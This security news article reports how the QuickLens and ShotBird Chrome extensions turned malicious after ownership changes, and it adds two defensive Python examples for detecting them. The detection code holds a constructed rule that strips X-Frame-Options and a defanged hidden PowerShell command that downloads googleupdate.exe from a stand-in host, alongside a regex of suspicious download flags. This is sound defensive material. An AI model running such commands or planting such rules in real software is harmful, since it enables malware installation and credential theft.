Two previously trusted Google Chrome extensions — QuickLens and ShotBird — have been transformed into attack tools following a change of ownership. Researchers from Annex Security and independent analyst monxresearch-sec documented how new versions of these extensions began executing arbitrary code, collecting user data, and distributing malware via fake Chrome update prompts.
Malicious Chrome extensions as a browser supply‑chain attack
Both extensions initially behaved as advertised. QuickLens, with roughly 7,000 installations, provided fast image search via Google Lens. ShotBird, installed about 800 times, was marketed as a “professional” screenshot and image tool with local processing. In January 2025, ShotBird was even labeled Featured in the Chrome Web Store — a marker many users interpret as a sign of higher trust and quality.
The risk emerged when the projects were sold. The QuickLens developer listed the extension on the trading platform ExtensionHub just two days after publication; on 1 February 2026 it was acquired by an account using [email protected]. According to the researchers, ShotBird was sold in February 2026. The malicious behavior appeared only after these ownership transfers.
This pattern highlights a growing browser extension supply‑chain vulnerability: a legitimate, popular extension with a positive reputation can silently turn into a malware distribution channel for thousands of users, with the switch occurring through a routine-looking update that few users scrutinize.
QuickLens: from helper tool to remote code execution platform
Tampering with HTTP security headers and bypassing browser defenses
On 17 February 2026, QuickLens received an update that preserved its visible functionality but embedded hidden malicious logic. The core change was interference with HTTP traffic: the extension began stripping security-related HTTP headers, including X-Frame-Options.
The X-Frame-Options header is widely used to prevent clickjacking by controlling whether a site may be embedded in an <iframe>. Removing this and related protections, such as the Content Security Policy (CSP) header, makes it easier for an attacker to inject and run arbitrary scripts on web pages viewed in the victim’s browser.
Remote payload delivery and stealthy telemetry collection
Annex Security reports that the modified QuickLens began collecting technical telemetry about users, including country, operating system, and browser version. Every five minutes, the extension contacted an external command‑and‑control server to fetch a new JavaScript payload, which was then executed within the browser context.
The malicious code was not present in the extension’s source files. Instead, payloads were downloaded at runtime, stored in the browser’s localStorage, and executed dynamically. This approach significantly complicates static code analysis, allows rapid changes to functionality without pushing a new Chrome Web Store release, and helps the attacker adapt campaigns in near real time.
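A defender-side check for the header stripping described above, added here as an example and not code from the report or from QuickLens: it scans an unpacked extension for declarativeNetRequest rules that remove security response headers. It assumes the stripping is done through a Manifest V3 modifyHeaders ruleset (the report does not state the mechanism), and the sample extension it builds on disk is constructed.

```python
import json
import os
import tempfile

# Response headers whose removal by an extension is a red flag. X-Frame-Options
# is the one named in the QuickLens report; the others are common companions.
SECURITY_HEADERS = {"x-frame-options", "content-security-policy",
                    "content-security-policy-report-only", "strict-transport-security"}

def header_removal_rules(ext_dir):
    """Return (rule_file, rule_id, header) for each declarativeNetRequest rule in
    an unpacked extension that removes one of SECURITY_HEADERS from responses."""
    with open(os.path.join(ext_dir, "manifest.json"), encoding="utf-8") as f:
        manifest = json.load(f)
    findings = []
    for res in manifest.get("declarative_net_request", {}).get("rule_resources", []):
        with open(os.path.join(ext_dir, res["path"]), encoding="utf-8") as f:
            rules = json.load(f)
        for rule in rules:
            action = rule.get("action", {})
            if action.get("type") != "modifyHeaders":
                continue
            for h in action.get("responseHeaders", []):
                name = h.get("header", "").lower()
                if h.get("operation") == "remove" and name in SECURITY_HEADERS:
                    findings.append((res["path"], rule.get("id"), name))
    return findings

def build_sample_extension():
    """Constructed sample (not QuickLens code): an unpacked MV3 extension whose
    ruleset strips X-Frame-Options from every top-level and sub-frame load."""
    d = tempfile.mkdtemp()
    manifest = {"manifest_version": 3, "name": "sample", "version": "1.0",
                "permissions": ["declarativeNetRequest"], "host_permissions": ["<all_urls>"],
                "declarative_net_request": {"rule_resources": [
                    {"id": "rs", "enabled": True, "path": "rules.json"}]}}
    rules = [{"id": 1, "priority": 1,
              "action": {"type": "modifyHeaders", "responseHeaders": [
                  {"header": "X-Frame-Options", "operation": "remove"}]},
              "condition": {"urlFilter": "*", "resourceTypes": ["main_frame", "sub_frame"]}}]
    with open(os.path.join(d, "manifest.json"), "w", encoding="utf-8") as f:
        json.dump(manifest, f)
    with open(os.path.join(d, "rules.json"), "w", encoding="utf-8") as f:
        json.dump(rules, f)
    return d

if __name__ == "__main__":
    for path, rule_id, header in header_removal_rules(build_sample_extension()):
        print(f"{path}: rule {rule_id} removes {header}")
```

Run it against a directory unpacked from a .crx to list any rule that silently drops these headers; an extension that needs none of them for its advertised purpose has no reason to carry such a rule.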
ShotBird: fake Chrome update and forced malware installation
ClickFix social engineering through deceptive update prompts
With ShotBird, the threat actor relied primarily on social engineering. The extension started displaying a fake Google Chrome update notification, claiming that an error had occurred and user action was required.
The attack followed the pattern known as ClickFix: the victim is guided step by step to open the Windows Run dialog, launch cmd.exe, and paste a prepared PowerShell command. Visually, this sequence is presented as a necessary troubleshooting step to “fix the update problem,” but in reality the user is tricked into launching malicious code with elevated system privileges.
Infostealer payload disguised as googleupdate.exe
The PowerShell script downloads an executable named googleupdate.exe to the victim’s machine. Once launched, this binary behaves like a classic infostealer:
- captures data entered into web forms (usernames, passwords, PINs, payment details, authentication tokens);
- extracts saved passwords and browsing history from Chrome;
- exfiltrates the collected information to attacker‑controlled servers.
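A detection example for the ClickFix chain and the googleupdate.exe drop described above, added here and not taken from the researchers' report: it runs over constructed, defanged process-creation events and flags a PowerShell process launched via explorer.exe -> cmd.exe, carrying window-hiding, policy-bypass or download flags, or spawning a googleupdate.exe outside the genuine updater directory. The event layout, the `.invalid` URL and the file paths are assumptions.

```python
import re
from collections import namedtuple
# Constructed Sysmon-style process-creation events (not real telemetry), reduced to
# pid, parent pid, image path and command line. Events 300-500 form the chain the
# article describes: Run dialog (explorer) -> cmd.exe -> PowerShell -> googleupdate.exe.
Event = namedtuple("Event", "pid ppid image cmdline")
SAMPLE_EVENTS = [
    Event(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event(200, 100, r"C:\Windows\System32\cmd.exe", 'cmd.exe /c "ipconfig /all"'),  # benign
    Event(300, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    Event(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r'powershell.exe -w hidden -ep bypass -c "iwr hxxp://c2.invalid/x '
          r'-OutFile $env:TEMP\googleupdate.exe"'),
    Event(500, 400, r"C:\Users\victim\AppData\Local\Temp\googleupdate.exe", "googleupdate.exe"),
]
# Window hiding, policy bypass, encoded commands and download cmdlets in one command line.
SUSPICIOUS_FLAGS = re.compile(r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass"
                              r"|-e(nc|ncodedcommand)\b|\biwr\b|invoke-webrequest"
                              r"|downloadstring|downloadfile|\bcurl\b", re.I)
LEGIT_UPDATER_DIR = "\\google\\update\\"  # the genuine GoogleUpdate.exe lives under Program Files

def base(image):
    return image.rsplit("\\", 1)[-1].lower()

def find_clickfix_chains(events):
    """Return [(powershell_pid, reasons)] for PowerShell processes showing at least two
    ClickFix traits: interactive explorer->cmd->powershell chain, suspicious flags,
    or a googleupdate.exe child started outside the real updater directory."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if base(e.image) != "powershell.exe":
            continue
        parent = by_pid.get(e.ppid)
        grand = by_pid.get(parent.ppid) if parent else None
        reasons = []
        if parent and grand and base(parent.image) == "cmd.exe" and base(grand.image) == "explorer.exe":
            reasons.append("explorer.exe -> cmd.exe -> powershell.exe (Run-dialog style launch)")
        flags = sorted({m.group(0).lower() for m in SUSPICIOUS_FLAGS.finditer(e.cmdline)})
        if flags:
            reasons.append("suspicious PowerShell flags: " + ", ".join(flags))
        for child in events:
            if (child.ppid == e.pid and base(child.image) == "googleupdate.exe"
                    and LEGIT_UPDATER_DIR not in child.image.lower()):
                reasons.append("googleupdate.exe spawned from " + child.image)
        if len(reasons) >= 2:
            hits.append((e.pid, reasons))
    return hits

if __name__ == "__main__":
    for pid, reasons in find_clickfix_chains(SAMPLE_EVENTS):
        print(f"PID {pid}:", *reasons, sep="\n  ")
```

Requiring two traits keeps an ordinary interactive cmd.exe (event 200) or a lone admin script with one flag from firing.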
Researchers note that the command‑and‑control infrastructure, the ClickFix technique, and the abuse of extension ownership changes all point to a single threat actor orchestrating both QuickLens and ShotBird campaigns.
What this means for Chrome Web Store security
The QuickLens and ShotBird cases once again demonstrate that a “one‑time review” security model for browser extensions is no longer sufficient. Even extensions with Featured badges and strong user ratings can become malicious when ownership or development teams change.
Similar scenarios have been documented before, where widely used ad blockers or tab managers were acquired and then silently repurposed to inject intrusive ads, harvest traffic data, or run hidden cryptocurrency miners. Because the user interface and main features often remain intact, such shifts frequently go unnoticed.
While Google has tightened extension policies over time (for example, through Manifest V3, stricter permission models, and automated code analysis), the human trust factor remains a weak link. Users rarely review their installed extensions, and the Chrome Web Store does not yet make ownership changes highly visible or disruptive to end users.
How to protect yourself from malicious Chrome extensions
To reduce the risk of compromise via browser extensions, users and organizations should adopt the following practices:
- Minimize installed extensions. Keep only extensions that are truly necessary and routinely remove those you no longer use.
- Scrutinize permissions. Be cautious of extensions requesting access to “all sites” or the ability to read and modify data on every page you visit.
- Monitor behavior after updates. Treat sudden changes in pop‑ups, prompts, or required user actions as red flags, especially after recent updates.
- Ignore Chrome updates triggered by extensions. Legitimate Chrome updates are handled by the browser or operating system and will never require running commands in cmd.exe or PowerShell.
- Use modern security tools. Endpoint protection, antivirus, and EDR solutions with behavioral detection can help block suspicious PowerShell commands and unauthorized network connections.
QuickLens and ShotBird show how quickly a familiar, long‑installed extension can become a serious security threat with a single update. Regular “browser hygiene,” skepticism toward unexpected prompts, and conscious extension management significantly lower the chances of a successful attack and the theft of sensitive data.